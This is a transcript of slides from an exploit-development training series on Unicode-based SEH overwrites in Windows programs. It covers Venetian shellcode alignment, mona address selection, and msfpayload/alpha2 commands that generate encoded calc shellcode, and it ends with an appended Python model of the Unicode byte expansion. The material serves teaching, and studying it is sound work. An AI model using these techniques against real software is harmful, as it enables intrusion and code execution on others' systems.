Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Published on

Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/

http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf

Published in: Education, Technology
Transcript of "Exploit Research and Development Megaprimer: Unicode Based Exploit Development"

  1. ASCII UNICODE CHART
  2-5. (slide text not captured in the transcript)
  6. Layout of the SEH overwrite (diagram, steps 1-3 ending at EIP):
    nSEH • JMP TO SHELLCODE ("\xeb\x06\x90\x90")
    SEH • POP,POP,RET SEQUENCE
    Shellcode • SHELLCODE
  7. The same layout under Unicode conversion (diagram, steps 1-3 ending at EIP):
    nSEH • JMP TO SHELLCODE. We can’t use an actual JMP; we walk to the shellcode using single-byte instructions along with NOP-like, harmless aligning instructions (Venetian shellcode).
    SEH • POP,POP,RET SEQUENCE (the address will be of the format 0x00aa00bb).
    Shellcode • UNICODE SHELLCODE (the shellcode is decoder + shellcode, so we have to point a register to the decoder and jump to it; we use the Venetian shellcode technique for alignment).
  8. nSEH • JMP TO SHELLCODE
    • We can’t use an actual JMP; we walk to the shellcode using single-byte instructions along with NOP-like, harmless aligning instructions (Venetian shellcode).
    • You need to try out the candidates and choose the working one, but you can check it only after you have checked SEH.
    • popad/inc eax, or selecting the NOPs. Example:
      "\x61\x41" implies 61 -> POPAD, 00 41 00 -> ADD BYTE PTR DS:[ECX],AL
      "\x41\x71" implies 41 -> INC ECX, 00 71 00 -> ADD BYTE PTR DS:[ECX],DH
    • 1-byte instructions: 41 : INC ECX, 61 : POPAD
  9. SEH • POP,POP,RET SEQUENCE (the address will be of the format 0x00aa00bb)
    Selecting a suitable address:
    • The address range should be between 0x00 and 0x7f.
    • Choose an address from modules without SafeSEH.
    • The address should be in the format 0x00aa00bb.
    • Say you choose “0x004d0041”; then specify “\x41\x4d” (little endian) in the shellcode.
    • “00” will be prepended by the program during execution.
    • Even if we get suitable addresses, not all of them work. You have to try each address to find one that doesn’t harm the execution flow and reaches our shellcode.
      !mona seh -cp unicode
    Suitable addresses: 0x004b00cb 0x004a0041 0x004a0059 0x004d0041 0x004100f2 0x004c0020
  10. Shellcode • UNICODE SHELLCODE (the shellcode is decoder + shellcode, so we have to point a register to the decoder and jump to it; we use the Venetian shellcode technique for alignment; diagram: Shellcode -> Decoder)
    • Generate the shellcode with Metasploit alone or use SkyLined’s alpha2 encoder.
      msfpayload windows/exec CMD=calc R | msfencode -e x86/unicode_upper BufferRegister=EAX -t raw
      msfpayload windows/exec CMD=calc R | ./alpha2 eax --unicode --uppercase
    • We need to point a register at our shellcode and jump to it. For alignment we use the Venetian shellcode technique.
    • We will use EAX to contain our shellcode.
  11. (slide text not captured in the transcript)
  12. • You will need to properly align the set of instructions with Venetian shellcode so that it won’t break at execution time.
    • You should be creative. You should analyze the execution flow in the debugger.
    • At times we need to add extra Venetian shellcode at the beginning and end to properly align everything.
    • So for example the previous code, after adding some Venetian shellcode, may look like this:
      "\x58"          # pop eax            : take the value of ebp and pop it into eax
      "\x71"          # Venetian padding
      "\x05\xbb\xaa"  # add eax,0xaa00bb00
      "\x71"          # Venetian padding
      "\x2d\xdd\xcc"  # sub eax,0xcc00dd00 : add and subtract; with 0xaa00bb00 > 0xcc00dd00 this yields a positive value X, which is in effect added to EAX
      "\x71"          # Venetian padding
      "\x50"          # push eax           : push the new value of EAX onto the stack
      "\x71"          # Venetian padding
      "\xC3"          # ret                : return the address of the shellcode in EAX to EIP for execution
    • Add sufficient NOP-like instructions to reach our shellcode.
    • An MSF pattern can be used, but it is better to just try it out yourself manually.
  13. References (the preceding bullets of this slide were not captured):
    • https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc
    • http://www.fuzzysecurity.com/tutorials/expDev/5.html
    • http://net-ninja.net/article/2010/May/29/unicode-the-magic-of-exploiting-0x00410041/
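As an added example that is not part of the deck: a Python model of the ASCII-to-UTF-16LE expansion behind the chart on slide 1, with the slide-9 address rules and the slide-12 immediate construction encoded as checks. The cp1252 code page and all function names are assumptions of this example, not something the slides state.

```python
import struct

# Added example (not from the slide deck). Models the ANSI -> UTF-16LE conversion
# and encodes the address/immediate constraints from slides 9 and 12 as checks.
# cp1252 is an assumed code page; the real mapping depends on the target program.

def unicode_expand(data: bytes, codepage: str = "cp1252") -> bytes:
    """Each input byte becomes a 2-byte code unit. 0x00-0x7f always become
    (b, 0x00); what happens above 0x7f depends on the code page."""
    return data.decode(codepage).encode("utf-16-le")

def survives_expansion(b: int, codepage: str = "cp1252") -> bool:
    """True when byte b comes out of the conversion as exactly (b, 0x00)."""
    try:
        return unicode_expand(bytes([b]), codepage) == bytes([b, 0x00])
    except UnicodeDecodeError:  # byte undefined in this code page
        return False

def is_unicode_seh_address(addr: int, strict_ascii: bool = True,
                           codepage: str = "cp1252") -> bool:
    """Slide-9 rules for a POP/POP/RET address: form 0x00aa00bb (the zero bytes
    are supplied by the conversion) and both sent bytes survive expansion.
    strict_ascii=True applies the deck's 0x00-0x7f range; False accepts any
    byte the given code page maps to itself (code-page dependent)."""
    if addr & 0xFF00FF00:
        return False
    lo, hi = addr & 0xFF, (addr >> 16) & 0xFF
    if strict_ascii:
        return lo <= 0x7F and hi <= 0x7F
    return survives_expansion(lo, codepage) and survives_expansion(hi, codepage)

def address_bytes(addr: int) -> bytes:
    """The two bytes placed in the buffer for 0x00aa00bb, little-endian
    (slide 9: 0x004d0041 -> b'\\x41\\x4d')."""
    return bytes([addr & 0xFF, (addr >> 16) & 0xFF])

def expanded_dword(two_bytes: bytes, codepage: str = "cp1252") -> int:
    """The 32-bit value the CPU reads after the two bytes are expanded."""
    return struct.unpack("<I", unicode_expand(two_bytes, codepage))[0]

def venetian_imm(opcode: int, lo: int, hi: int) -> int:
    """imm32 seen by 'add/sub eax, imm32' when bytes (opcode, lo, hi) are sent:
    expansion gives op 00 lo 00 hi 00, so imm32 = 00 lo 00 hi = 0xhh00ll00
    (slide 12: \\x05\\xbb\\xaa -> add eax, 0xaa00bb00)."""
    expanded = unicode_expand(bytes([opcode, lo, hi]))
    return struct.unpack("<I", expanded[1:5])[0]

def venetian_net_delta(add_imm: int, sub_imm: int) -> int:
    """Net change to EAX from 'add eax, add_imm; sub eax, sub_imm', mod 2**32."""
    return (add_imm - sub_imm) & 0xFFFFFFFF
```

Under cp1252, bytes in 0x80-0x9f do not expand to (b, 0x00) while bytes such as 0xcb do, which is why a candidate address is only as good as your knowledge of the conversion the target actually performs.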